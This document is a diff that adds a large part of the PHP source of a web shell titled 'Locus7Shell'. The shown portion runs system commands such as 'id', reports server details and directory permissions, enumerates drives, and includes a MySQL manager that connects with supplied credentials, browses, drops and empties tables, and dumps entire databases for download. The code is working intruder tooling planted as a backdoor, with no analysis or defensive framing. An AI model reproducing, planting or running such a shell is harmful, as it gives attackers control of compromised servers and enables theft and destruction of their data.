+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE)); 
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF 
+@ini_set("highlight.comment",$highlight_comment); //#FF8000 
+@ini_set("highlight.default",$highlight_default); //#0000BB 
+@ini_set("highlight.html",$highlight_html); //#000000 
+@ini_set("highlight.keyword",$highlight_keyword); //#007700 
+@ini_set("highlight.string",$highlight_string); //#DD0000 
+if (!is_array($actbox)) {$actbox = array();} 
+$dspact = $act = htmlspecialchars($act); 
+$disp_fullpath = $ls_arr = $notls = null; 
+$ud = urlencode($d); 
+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - Locus7Shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #009900; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #009900; scrollbar-shadow-color: #000000; scrollbar-highlight-color: #00CC00; scrollbar-3dlight-color: #00CC00; scrollbar-darkshadow-color: #009900; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #000000; COLOR: green; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #009900; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #f89521; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #f89521; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #f89521; TEXT-DECORATION: none;}A:hover { COLOR: #f89521; TEXT-DECORATION: bold;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #009900; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #009900;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><center><img src="http://img244.imageshack.us/img244/6663/locus7sgm8.jpg"></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php 
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} 
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+$d = str_replace("\\\\","\\",$d); 
+$dispd = htmlspecialchars($d); 
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); 
+$i = 0; 
+foreach($pd as $b) 
+{ 
+ $t = ""; 
+ $j = 0; 
+ foreach ($e as $r) 
+ { 
+  $t.= $r.DIRECTORY_SEPARATOR; 
+  if ($j == $i) {break;} 
+  $j++; 
+ } 
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>"; 
+ $i++; 
+} 
+echo "&nbsp;&nbsp;&nbsp;"; 
+if (is_writable($d)) 
+{ 
+ $wd = TRUE; 
+ $wdt = "<font color=green>[ ok ]</font>"; 
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>"; 
+} 
+else 
+{ 
+ $wd = FALSE; 
+ $wdt = "<font color=red>[ Read-Only ]</font>"; 
+ echo "<b>".view_perms_color($d)."</b>"; 
+} 
+if (is_callable("disk_free_space")) 
+{ 
+ $free = disk_free_space($d); 
+ $total = disk_total_space($d); 
+ if ($free === FALSE) {$free = 0;} 
+ if ($total === FALSE) {$total = 0;} 
+ if ($free < 0) {$free = 0;} 
+ if ($total < 0) {$total = 0;} 
+ $used = $total-$free; 
+ $free_percent = round(100/($total/$free),2); 
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>"; 
+} 
+echo "<br>";
+echo "<b>Your ip: <a href=http://whois.domaintools.com/".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://whois.domaintools.com/".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>"; 
+$letters = ""; 
+if ($win) 
+{ 
+ $v = explode("\\",$d); 
+ $v = $v[0]; 
+ foreach (range("a","z") as $letter) 
+ { 
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes); 
+  if (!$bool) {$bool = is_dir($letter.":\\");} 
+  if ($bool) 
+  { 
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ "; 
+   if ($letter.":" != $v) {$letters .= $letter;} 
+   else {$letters .= "<font color=green>".$letter."</font>";} 
+   $letters .= " ]</a> "; 
+  } 
+ } 
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";} 
+} 
+if (count($quicklaunch) > 0) 
+{ 
+ foreach($quicklaunch as $item) 
+ { 
+  $item[1] = str_replace("%d",urlencode($d),$item[1]); 
+  $item[1] = str_replace("%sort",$sort,$item[1]); 
+  $v = realpath($d.".."); 
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} 
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]); 
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;"; 
+ } 
+} 
+echo "</p></td></tr></table><br>"; 
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";} 
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">"; 
+if ($act == "") {$act = $dspact = "ls";} 
+if ($act == "sql") 
+{ 
+ $sql_surl = $surl."act=sql"; 
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} 
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} 
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} 
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} 
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} 
+ $sql_surl .= "&"; 
+ ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php 
+ if ($sql_server) 
+ { 
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); 
+  $err = mysql_smarterror(); 
+  @mysql_select_db($sql_db,$sql_sock); 
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} 
+ } 
+ else {$sql_sock = FALSE;} 
+ echo "<b>SQL Manager:</b><br>"; 
+ if (!$sql_sock) 
+ { 
+  if (!$sql_server) {echo "NO CONNECTION";} 
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} 
+ } 
+ else 
+ { 
+  $sqlquicklaunch = array(); 
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); 
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); 
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); 
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); 
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); 
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql"); 
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; 
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}} 
+  echo "</center>"; 
+ } 
+ echo "</td></tr><tr>"; 
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php } 
+ else 
+ { 
+  //Start left panel 
+  if (!empty($sql_db)) 
+  { 
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php 
+   $result = mysql_list_tables($sql_db); 
+   if (!$result) {echo mysql_smarterror();} 
+   else 
+   { 
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; 
+    $c = 0; 
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>+&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;} 
+    if (!$c) {echo "No tables found in database.";} 
+   } 
+  } 
+  else 
+  { 
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php 
+   $result = mysql_list_dbs($sql_sock); 
+   if (!$result) {echo mysql_smarterror();} 
+   else 
+   { 
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php 
+    $c = 0; 
+    $dbs = ""; 
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;} 
+    echo "<option value=\"\">Databases (".$c.")</option>"; 
+    echo $dbs; 
+   } 
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php 
+  } 
+  //End left panel 
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; 
+  //Start center panel 
+  $diplay = TRUE; 
+  if ($sql_db) 
+  { 
+   if (!is_numeric($c)) {$c = 0;} 
+   if ($c == 0) {$c = "no";} 
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>"; 
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} 
+   echo "</b></center>"; 
+   $acts = array("","dump"); 
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} 
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} 
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} 
+   elseif ($sql_tbl_act == "insert") 
+   { 
+    if ($sql_tbl_insert_radio == 1) 
+    { 
+     $keys = ""; 
+     $akeys = array_keys($sql_tbl_insert); 
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} 
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} 
+     $values = ""; 
+     $i = 0; 
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} 
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} 
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; 
+     $sql_act = "query"; 
+     $sql_tbl_act = "browse"; 
+    } 
+    elseif ($sql_tbl_insert_radio == 2) 
+    { 
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); 
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; 
+     $result = mysql_query($sql_query) or print(mysql_smarterror()); 
+     $result = mysql_fetch_array($result, MYSQL_ASSOC); 
+     $sql_act = "query"; 
+     $sql_tbl_act = "browse"; 
+    } 
+   } 
+   if ($sql_act == "query") 
+   { 
+    echo "<hr size=\"1\" noshade>"; 
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} 
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} 
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";} 
+   } 
+   if (in_array($sql_act,$acts)) 
+   { 
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php 
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} 
+    if ($sql_act == "newtbl") 
+    { 
+     echo "<b>"; 
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; 
+    } 
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} 
+   } 
+   elseif ($sql_act == "dump") 
+   { 
+    if (empty($submit)) 
+    { 
+     $diplay = FALSE; 
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>"; 
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>"; 
+     $v = join (";",$dmptbls); 
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>"; 
+     if ($dump_file) {$tmp = $dump_file;} 
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} 
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>"; 
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>"; 
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>"; 
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty"; 
+     echo "</form>"; 
+    } 
+    else 
+    { 
+     $diplay = TRUE; 
+     $set = array(); 
+     $set["sock"] = $sql_sock; 
+     $set["db"] = $sql_db; 
+     $dump_out = "download"; 
+     $set["print"] = 0; 
+     $set["nl2br"] = 0; 
+     $set[""] = 0; 
+     $set["file"] = $dump_file; 
+     $set["add_drop"] = TRUE; 
+     $set["onlytabs"] = array(); 
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} 
+     $ret = mysql_dump($set); 
+     if ($sql_dump_download) 
+     { 
+      @ob_clean(); 
+      header("Content-type: application/octet-stream"); 
+      header("Content-length: ".strlen($ret)); 
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); 
+      echo $ret; 
+      exit; 
+     } 
+     elseif ($sql_dump_savetofile) 
+     { 
+      $fp = fopen($sql_dump_file,"w"); 
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} 
+      else 
+      { 
+       fwrite($fp,$ret); 
+       fclose($fp); 
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>."; 
+      } 
+     } 
+     else {echo "<b>Dump: nothing to do!</b>";} 
+    } 
+   } 
+   if ($diplay) 
+   { 
+    if (!empty($sql_tbl)) 
+    { 
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} 
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); 
+     $count_row = mysql_fetch_array($count); 
+     mysql_free_result($count); 
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); 
+     $tbl_struct_fields = array(); 
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} 
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} 
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} 
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} 
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} 
+     $perpage = $sql_tbl_le - $sql_tbl_ls; 
+     if (!is_numeric($perpage)) {$perpage = 10;} 
+     $numpages = $count_row[0]/$perpage; 
+     $e = explode(" ",$sql_order); 
+     if (count($e) == 2) 
+     { 
+      if ($e[0] == "d") {$asc_desc = "DESC";} 
+      else {$asc_desc = "ASC";} 
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; 
+     } 
+     else {$v = "";} 
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; 
+     $result = mysql_query($query) or print(mysql_smarterror()); 
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";} 
+     if ($sql_tbl_act == "insert") 
+     { 
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} 
+      if (!empty($sql_tbl_insert_radio)) 
+      { 
+
+      } 
+      else 
+      { 
+       echo "<br><br><b>Inserting row into table:</b><br>"; 
+       if (!empty($sql_tbl_insert_q)) 
+       { 
+        $sql_query = "SELECT * FROM `".$sql_tbl."`"; 
+        $sql_query .= " WHERE".$sql_tbl_insert_q; 
+        $sql_query .= " LIMIT 1;"; 
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror()); 
+        $values = mysql_fetch_assoc($result); 
+        mysql_free_result($result); 
+       } 
+       else {$values = array();} 
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>"; 
+       foreach ($tbl_struct_fields as $field) 
+       { 
+        $name = $field["Field"]; 
+        if (empty($sql_tbl_insert_q)) {$v = "";} 
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>"; 
+        $i++; 
+       } 
+       echo "</table><br>"; 
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>"; 
